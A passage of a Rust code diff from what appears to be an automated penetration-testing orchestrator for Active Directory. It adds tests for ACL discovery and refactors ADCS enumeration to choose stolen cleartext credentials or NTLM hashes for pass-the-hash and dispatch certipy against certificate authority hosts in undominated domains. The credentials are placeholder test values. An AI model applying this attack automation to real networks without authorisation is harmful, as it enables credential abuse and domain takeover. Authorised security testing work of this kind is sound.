+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:cred".into());
+ state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:hash".into());
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_but_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:cred".into());
+ state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:hash".into());
+ state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:trust".into());
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Add cross-domain cred first, then same-domain cred
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_cross_domain_cred_skipped_without_hash() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Only a fabrikam credential available for contoso DC — should NOT fall back
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 0, "cross-domain cred should not produce work");
+ }
+
+ #[test]
+ fn collect_skips_empty_password_credentials() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Credential with empty password
+ state
+ .credentials
+ .push(make_credential("admin", "", "contoso.local"));
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_empty_password_uses_next() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("nopw", "", "contoso.local"));
+ state
+ .credentials
+ .push(make_credential("haspw", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "haspw");
+ }
+
+ #[test]
+ fn collect_known_users_only_from_same_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("jdoe", "Pass!456", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].known_users.len(), 2);
+ assert!(work[0].known_users.contains(&"admin".to_string()));
+ assert!(work[0].known_users.contains(&"jdoe".to_string()));
+ assert!(!work[0].known_users.contains(&"crossuser".to_string()));
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "acl_disc:contoso.local:cred");
+ }
+
+ #[test]
+ fn collect_all_empty_password_creds_skips_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("user1", "", "contoso.local"));
+ state
+ .credentials
+ .push(make_credential("user2", "", "fabrikam.local"));
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_quarantined_credential_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_quarantined_same_domain_skipped_without_hash() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ // No same-domain cred (quarantined) and no hash → skip
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(
+ work.len(),
+ 0,
+ "quarantined same-domain cred should not fall back to cross-domain"
+ );
+ }
+
+ #[test]
+ fn collect_all_credentials_quarantined_skips_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("user1", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("user2", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
+ state.quarantine_credential("user1", "contoso.local");
+ state.quarantine_credential("user2", "fabrikam.local");
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_case_insensitive_domain_matching_for_creds() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "Contoso.Local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ // Should match via case-insensitive comparison
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "Contoso.Local");
+ }
+
+ #[test]
+ fn collect_known_users_includes_empty_password_users() {
+ // known_users collects ALL creds for the domain, even ones with empty passwords
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("nopw_user", "", "contoso.local"));
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ // Both users should appear in known_users (useful for ACE checking)
+ assert_eq!(work[0].known_users.len(), 2);
+ assert!(work[0].known_users.contains(&"admin".to_string()));
+ assert!(work[0].known_users.contains(&"nopw_user".to_string()));
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/adcs.rs b/ares-cli/src/orchestrator/automation/adcs.rs
index f46d6a06..da76ef19 100644
--- a/ares-cli/src/orchestrator/automation/adcs.rs
+++ b/ares-cli/src/orchestrator/automation/adcs.rs
@@ -17,6 +17,230 @@ fn extract_domain_from_fqdn(fqdn: &str) -> Option {
.map(|(_, d)| d.to_string())
}
+/// Work item for ADCS enumeration.
+struct AdcsWork {
+ host_ip: String,
+ /// Auth-and-identity dedup key
+ /// (e.g. `"192.168.58.10:cred:jdoe@contoso.local"` or `"…:hash:admin@…"`).
+ /// Including the credential identity prevents one wrong-domain attempt
+ /// from permanently locking a CA host against later, possibly-correct creds.
+ dedup_key: String,
+ dc_ip: Option,
+ domain: String,
+ credential: ares_core::models::Credential,
+ /// NTLM hash for pass-the-hash authentication (when no cleartext cred available).
+ ntlm_hash: Option,
+ ntlm_hash_username: Option,
+}
+
+/// Dedup key for a cred-based certipy_find attempt.
+/// Format: `{host}:cred:{username}@{domain}` (lowercased identity).
+pub(crate) fn dedup_key_cred(host: &str, cred: &ares_core::models::Credential) -> String {
+ format!(
+ "{}:cred:{}@{}",
+ host,
+ cred.username.to_lowercase(),
+ cred.domain.to_lowercase()
+ )
+}
+
+/// Dedup key for a hash-based certipy_find attempt.
+/// Format: `{host}:hash:{username}@{domain}` (lowercased identity).
+pub(crate) fn dedup_key_hash(host: &str, hash: &ares_core::models::Hash) -> String {
+ format!(
+ "{}:hash:{}@{}",
+ host,
+ hash.username.to_lowercase(),
+ hash.domain.to_lowercase()
+ )
+}
+
+/// Collect ADCS enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_adcs_enumeration` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_adcs_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() && state.hashes.is_empty() {
+ return Vec::new();
+ }
+
+ state
+ .shares
+ .iter()
+ .filter(|s| s.name.to_lowercase() == "certenroll")
+ .filter_map(|s| {
+ let host_lower = s.host.to_lowercase();
+
+ let domain = state
+ .hosts
+ .iter()
+ .find(|h| h.ip == s.host || h.hostname.to_lowercase() == host_lower)
+ .and_then(|h| extract_domain_from_fqdn(&h.hostname))
+ .and_then(|d| {
+ if state.domains.iter().any(|known| known.to_lowercase() == d) {
+ Some(d)
+ } else {
+ state
+ .domains
+ .iter()
+ .find(|known| d.ends_with(&format!(".{}", known.to_lowercase())))
+ .or_else(|| {
+ state
+ .domains
+ .iter()
+ .find(|known| known.to_lowercase().ends_with(&format!(".{d}")))
+ })
+ .cloned()
+ .or(Some(d))
+ }
+ })
+ .or_else(|| state.domains.first().cloned())?;
+
+ // Skip domains we already own — DA on a domain means we don't
+ // need to escalate via its CA. (We may still need ADCS against an
+ // un-owned domain via cross-trust, so this is per-domain not global.)
+ if state.dominated_domains.contains(&domain) {
+ return None;
+ }
+
+ // Look up DC IP for this domain (certipy needs LDAP on a DC, not the CA host).
+ // Uses resolve_dc_ip() which falls back to scanning hosts list when
+ // domain_controllers doesn't have an entry.
+ let dc_ip = state.resolve_dc_ip(&domain);
+
+ // certipy_find authenticates via LDAP bind to the target DC.
+ // NTLM/Kerberos bind succeeds within the same forest (same domain or
+ // parent/child/sibling) but fails 52e across a forest trust because
+ // the source principal does not exist in the target's domain and
+ // impacket cannot follow Kerberos cross-realm referrals.
+ //
+ // Restrict cred selection to the same forest as the target. If no
+ // same-forest cred exists, skip dispatch — other automations
+ // (foreign_group_enum, mssql_linked_server, golden_cert) handle
+ // the cross-forest foothold path that yields a same-forest cred.
+ //
+ // The dedup key includes the candidate credential's identity, so a
+ // failed first attempt with one cred does not block a later, possibly
+ // correct cred against the same CA host.
+ let domain_lower = domain.to_lowercase();
+ let target_forest = state.forest_root_of(&domain_lower);
+ let cred = {
+ let mut candidates: Vec<&ares_core::models::Credential> = state
+ .credentials
+ .iter()
+ .filter(|c| {
+ !c.password.is_empty()
+ && c.domain.to_lowercase() == domain_lower
+ && !state.is_delegation_account(&c.username)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .collect();
+ candidates.extend(state.credentials.iter().filter(|c| {
+ let cd = c.domain.to_lowercase();
+ !c.password.is_empty()
+ && cd != domain_lower
+ && state.forest_root_of(&cd) == target_forest
+ && !state.is_delegation_account(&c.username)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ }));
+ candidates
+ .into_iter()
+ .find(|c| !state.is_processed(DEDUP_ADCS_SERVERS, &dedup_key_cred(&s.host, c)))
+ .cloned()
+ };
+
+ // Look for NTLM hash (PTH) only if cred path is exhausted (no
+ // unprocessed cred candidate exists). Same identity-aware dedup.
+ let hash_pick = if cred.is_none() {
+ let pred_admin_same = |h: &&ares_core::models::Hash| {
+ h.hash_type.eq_ignore_ascii_case("ntlm")
+ && (h.domain.to_lowercase() == domain_lower || h.domain.is_empty())
+ && h.username.to_lowercase() == "administrator"
+ };
+ let pred_any_same = |h: &&ares_core::models::Hash| {
+ h.hash_type.eq_ignore_ascii_case("ntlm")
+ && (h.domain.to_lowercase() == domain_lower || h.domain.is_empty())
+ && !state.is_delegation_account(&h.username)
+ };
+ let same_forest = |h: &&ares_core::models::Hash| -> bool {
+ let hd = h.domain.to_lowercase();
+ !hd.is_empty() && state.forest_root_of(&hd) == target_forest
+ };
+ let pred_admin_xdom = |h: &&ares_core::models::Hash| {
+ h.hash_type.eq_ignore_ascii_case("ntlm")
+ && same_forest(h)
+ && h.username.to_lowercase() == "administrator"
+ };
+ let pred_any_xdom = |h: &&ares_core::models::Hash| {
+ h.hash_type.eq_ignore_ascii_case("ntlm")
+ && same_forest(h)
+ && !state.is_delegation_account(&h.username)
+ };
+
+ let mut candidates: Vec<&ares_core::models::Hash> = Vec::new();
+ candidates.extend(state.hashes.iter().filter(pred_admin_same));
+ candidates.extend(state.hashes.iter().filter(pred_any_same).filter(|h| {
+ h.username.to_lowercase() != "administrator"
+ || (h.domain.to_lowercase() != domain_lower && !h.domain.is_empty())
+ }));
+ candidates.extend(
+ state.hashes.iter().filter(pred_admin_xdom).filter(|h| {
+ h.domain.to_lowercase() != domain_lower && !h.domain.is_empty()
+ }),
+ );
+ candidates.extend(
+ state
+ .hashes
+ .iter()
+ .filter(pred_any_xdom)
+ .filter(|h| h.username.to_lowercase() != "administrator"),
+ );
+ candidates
+ .into_iter()
+ .find(|h| !state.is_processed(DEDUP_ADCS_SERVERS, &dedup_key_hash(&s.host, h)))
+ .cloned()
+ } else {
+ None
+ };
+ let (ntlm_hash, ntlm_hash_username) = match &hash_pick {
+ Some(h) => (Some(h.hash_value.clone()), Some(h.username.clone())),
+ None => (None, None),
+ };
+
+ // Need at least a credential or an NTLM hash
+ if cred.is_none() && ntlm_hash.is_none() {
+ return None;
+ }
+
+ let dedup_key = match (&cred, &hash_pick) {
+ (Some(c), _) => dedup_key_cred(&s.host, c),
+ (None, Some(h)) => dedup_key_hash(&s.host, h),
+ (None, None) => return None,
+ };
+
+ Some(AdcsWork {
+ host_ip: s.host.clone(),
+ dedup_key,
+ dc_ip,
+ domain: domain.clone(),
+ credential: cred.unwrap_or_else(|| ares_core::models::Credential {
+ id: String::new(),
+ username: ntlm_hash_username.clone().unwrap_or_default(),
+ password: String::new(),
+ domain,
+ source: "hash_fallback".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }),
+ ntlm_hash,
+ ntlm_hash_username,
+ })
+ })
+ .collect()
+}
+
/// Detects ADCS servers by looking for CertEnroll shares and dispatches certipy_find.
/// Interval: 30s. Matches Python `_auto_adcs_enumeration`.
pub async fn auto_adcs_enumeration(
@@ -35,78 +259,70 @@ pub async fn auto_adcs_enumeration(
break;
}
- // Find CertEnroll shares on unprocessed hosts + get a credential
- let work: Vec<(String, String, ares_core::models::Credential)> = {
+ let work = {
let state = dispatcher.state.read().await;
- let cred = match state
- .credentials
- .iter()
- .find(|c| {
- !state.is_delegation_account(&c.username)
- && !state.is_credential_quarantined(&c.username, &c.domain)
- })
- .or_else(|| state.credentials.first())
- {
- Some(c) => c.clone(),
- None => continue,
- };
- state
+ let creds = state.credentials.len();
+ let hashes = state.hashes.len();
+ let certenroll_shares: Vec<_> = state
.shares
.iter()
.filter(|s| s.name.to_lowercase() == "certenroll")
- .filter(|s| !state.is_processed(DEDUP_ADCS_SERVERS, &s.host))
- .filter_map(|s| {
- // Resolve the domain for this ADCS host by matching the
- // host's FQDN against known domains, or finding which DC
- // subnet the host belongs to. Falls back to first domain.
- let host_lower = s.host.to_lowercase();
- let domain = state
- .hosts
- .iter()
- .find(|h| h.ip == s.host || h.hostname.to_lowercase() == host_lower)
- .and_then(|h| extract_domain_from_fqdn(&h.hostname))
- .and_then(|d| {
- // Verify it's a known domain
- if state.domains.iter().any(|known| known.to_lowercase() == d) {
- Some(d)
- } else {
- // Try parent match (e.g. child.contoso.local → contoso.local)
- state
- .domains
- .iter()
- .find(|known| {
- d.ends_with(&format!(".{}", known.to_lowercase()))
- })
- .or_else(|| {
- state.domains.iter().find(|known| {
- known.to_lowercase().ends_with(&format!(".{d}"))
- })
- })
- .cloned()
- .or(Some(d))
- }
- })
- .or_else(|| state.domains.first().cloned())?;
- Some((s.host.clone(), domain, cred.clone()))
- })
- .collect()
+ .collect();
+ let ce_count = certenroll_shares.len();
+ let ce_hosts: Vec<_> = certenroll_shares.iter().map(|s| s.host.as_str()).collect();
+ let cred_domains: Vec<_> = state
+ .credentials
+ .iter()
+ .map(|c| c.domain.as_str())
+ .collect();
+ let hash_domains: Vec<_> = state.hashes.iter().map(|h| h.domain.as_str()).collect();
+ let domains: Vec<_> = state.domains.iter().map(|d| d.as_str()).collect();
+ let w = collect_adcs_work(&state);
+ info!(
+ creds,
+ hashes,
+ certenroll_shares = ce_count,
+ ?ce_hosts,
+ ?cred_domains,
+ ?hash_domains,
+ ?domains,
+ work_items = w.len(),
+ "auto_adcs_enumeration: tick"
+ );
+ w
};
- for (host_ip, domain, cred) in work {
+ for item in work {
+ // Use DC IP for certipy LDAP queries; fall back to CA host IP
+ let target_ip = item.dc_ip.as_deref().unwrap_or(&item.host_ip);
+ // Pass CA host IP separately so the parser sets the correct vuln target
+ // (the CA server, not the DC used for LDAP).
+ let ca_host_ip = if item.dc_ip.is_some() {
+ Some(item.host_ip.as_str())
+ } else {
+ None
+ };
match dispatcher
- .request_certipy_find(&host_ip, &domain, &cred)
+ .request_certipy_find(
+ target_ip,
+ &item.domain,
+ &item.credential,
+ item.ntlm_hash.as_deref(),
+ item.ntlm_hash_username.as_deref(),
+ ca_host_ip,
+ )
.await
{
Ok(Some(task_id)) => {
- info!(task_id = %task_id, host = %host_ip, "ADCS enumeration dispatched");
+ info!(task_id = %task_id, host = %item.host_ip, dc_ip = ?item.dc_ip, "ADCS enumeration dispatched");
dispatcher
.state
.write()
.await
- .mark_processed(DEDUP_ADCS_SERVERS, host_ip.clone());
+ .mark_processed(DEDUP_ADCS_SERVERS, item.dedup_key.clone());
let _ = dispatcher
.state
- .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &host_ip)
+ .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &item.dedup_key)
.await;
}
Ok(None) => {}
@@ -119,6 +335,259 @@ pub async fn auto_adcs_enumeration(
#[cfg(test)]
mod tests {
use super::*;
+ use ares_core::models::{Credential, Host, Share};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc,
+ owned: false,
+ }
+ }
+
+ fn make_share(host: &str, name: &str) -> Share {
+ Share {
+ host: host.into(),
+ name: name.into(),
+ permissions: String::new(),
+ comment: String::new(),
+ }
+ }
+
+ // --- collect_adcs_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_adcs_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ let work = collect_adcs_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_certenroll_share_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].host_ip, "192.168.58.50");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ let cred = make_credential("admin", "P@ssw0rd!", "contoso.local"); // pragma: allowlist secret
+ state.credentials.push(cred.clone());
+ // Mark the identity-aware dedup key for the only candidate cred.
+ state.mark_processed(DEDUP_ADCS_SERVERS, dedup_key_cred("192.168.58.50", &cred));
+ let work = collect_adcs_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_non_certenroll_share_ignored() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "SYSVOL"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "dc01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.fabrikam.local", false));
+ state.domains.push("fabrikam.local".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("fabadmin", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabadmin");
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_domain_when_no_host_match() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ // No matching host in state.hosts
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_certenroll_case_insensitive() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "certenroll"));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn collect_multiple_adcs_hosts() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state.shares.push(make_share("192.168.58.51", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state
+ .hosts
+ .push(make_host("192.168.58.51", "ca02.fabrikam.local", false));
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("fabadmin", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_skips_cross_forest_cred_for_ca_host() {
+ // contoso.local CA, only fabrikam.local cred (different forest).
+ // certipy_find LDAP bind across forest trust fails 52e — skip dispatch.
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .credentials
+ .push(make_credential("foreigner", "P@ss!", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert!(
+ work.is_empty(),
+ "should not dispatch ADCS enum with cross-forest cred"
+ );
+ }
+
+ #[test]
+ fn collect_uses_child_domain_cred_for_parent_ca() {
+ // child cred → parent CA: same forest, LDAP bind succeeds.
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ state.domains.push("dev.contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("childuser", "P@ss!", "dev.contoso.local")); // pragma: allowlist secret
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "childuser");
+ }
+
+ #[test]
+ fn collect_quarantined_same_domain_does_not_fall_back_cross_forest() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_adcs_work(&state);
+ assert!(
+ work.is_empty(),
+ "cross-forest LDAP bind fails 52e — must not dispatch with fabrikam cred"
+ );
+ }
+
+ #[test]
+ fn collect_quarantined_same_domain_falls_back_to_sibling_in_same_forest() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ state.domains.push("dev.contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("gooduser", "Pass!456", "dev.contoso.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_adcs_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "gooduser");
+ }
#[test]
fn extract_domain_from_fqdn_typical() {
@@ -159,4 +628,70 @@ mod tests {
// "host." splits into ("host", "") -> Some("")
assert_eq!(extract_domain_from_fqdn("host."), Some("".to_string()));
}
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_ADCS_SERVERS, "adcs_servers");
+ }
+
+ #[test]
+ fn certenroll_share_name_match() {
+ let share_name = "CertEnroll";
+ assert_eq!(share_name.to_lowercase(), "certenroll");
+ }
+
+ #[test]
+ fn certenroll_case_insensitive() {
+ let names = vec!["CertEnroll", "certenroll", "CERTENROLL"];
+ for name in names {
+ assert_eq!(name.to_lowercase(), "certenroll");
+ }
+ }
+
+ #[test]
+ fn domain_resolution_from_fqdn() {
+ // Verifies domain extraction works for typical ADCS hosts
+ assert_eq!(
+ extract_domain_from_fqdn("ca01.contoso.local"),
+ Some("contoso.local".to_string())
+ );
+ assert_eq!(
+ extract_domain_from_fqdn("ca01.fabrikam.local"),
+ Some("fabrikam.local".to_string())
+ );
+ }
+
+ #[test]
+ fn credential_selection_prefers_same_domain() {
+ let creds = [
+ ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ },
+ ares_core::models::Credential {
